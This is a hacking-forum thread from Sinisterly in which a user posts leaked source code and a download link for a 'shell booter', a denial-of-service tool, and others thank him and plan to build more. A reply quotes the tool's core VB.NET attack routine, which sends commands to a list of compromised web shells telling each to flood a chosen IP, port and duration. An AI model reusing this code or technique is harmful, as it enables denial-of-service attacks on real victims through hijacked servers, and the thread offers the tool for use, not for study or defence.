Sinisterly
Snow's V3 Booter Source. - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Visual Basic & .NET Framework (https://sinister.ly/Forum-Visual-Basic-NET-Framework)
+--- Thread: Snow's V3 Booter Source. (/Thread-Snow-s-V3-Booter-Source)

Pages: 1 2


Snow's V3 Booter Source. - Nefarious - 07-26-2013

If you download this, don't be a leech! Say thanks.

Here is the source code for Snow's shell booter.
I guess it's private, so I decided to leak it. Enjoy.

Screenshots.
Spoiler:
[Image: 94d37e0d72.png]
[Image: 2b0604c282.png]



Download:
Ge.tt

Virus scan: (Because Johnny doesn't trust my links, idfk why.)
VirusTotal


RE: Snow's V3 Booter Source. - Oni - 07-26-2013

Nice share. Smile


RE: Snow's V3 Booter Source. - ねこまっしぐら - 07-26-2013

Thanks for the share. I will figure out about these "source codes". I shall do something productive.


RE: Snow's V3 Booter Source. - Customer - 07-26-2013

Thanks.

Will download this.


RE: Snow's V3 Booter Source. - Nefarious - 07-26-2013

(07-26-2013, 06:36 AM)Johnny Wrote: Thanks for the share. I will figure out about these "source codes". I shall do something productive.

You will need visual studio 2010.


RE: Snow's V3 Booter Source. - SQLi - 07-26-2013

Haha, oh god. And he's got 1K reputation.

The main piece of code:
Code:
Sub attack() Dim i As Integer Dim web As New WebClient With {.Proxy = Nothing} 'http://1.2.3.4Shell.php?act=phptools&host=68.49.228.103&time=10 Dim attkstring As String = "?act=phptools&host=" & IP.Text & "&port=" & Port.Text & "&time=" & Time.Text i = 0 AttackButton.Enabled = False Dim shellx As Integer = 0 For Each item In shells.Items Try web.Dispose() web.OpenRead(shells.Items(shellx) & attkstring) Catch ex As Exception End Try shellx += 1 Next AttackButton.Enabled = True End Sub

Either way, good job leaking.


RE: Snow's V3 Booter Source. - Nefarious - 07-26-2013

(07-26-2013, 11:20 AM)SQLi Wrote: Haha, oh god. And he's got 1K reputation.

The main piece of code:
Code:
Sub attack() Dim i As Integer Dim web As New WebClient With {.Proxy = Nothing} 'http://1.2.3.4Shell.php?act=phptools&host=68.49.228.103&time=10 Dim attkstring As String = "?act=phptools&host=" & IP.Text & "&port=" & Port.Text & "&time=" & Time.Text i = 0 AttackButton.Enabled = False Dim shellx As Integer = 0 For Each item In shells.Items Try web.Dispose() web.OpenRead(shells.Items(shellx) & attkstring) Catch ex As Exception End Try shellx += 1 Next AttackButton.Enabled = True End Sub

Either way, good job leaking.

Who has 1k rep? O_o
At least he didn't use web browsers xD


RE: Snow's V3 Booter Source. - SQLi - 07-26-2013

(07-26-2013, 12:09 PM)Kirito Wrote: Who has 1k rep? O_o
At least he didn't use web browsers xD

The person who made that project, he put his own HF link somewhere in it.


RE: Snow's V3 Booter Source. - TheHackBaby - 12-12-2015

nice Biggrin good job i keep on leaking more im going to make a wb booter Smile


RE: Snow's V3 Booter Source. - Xfcbantox - 02-07-2016

Thanks.

Will download this.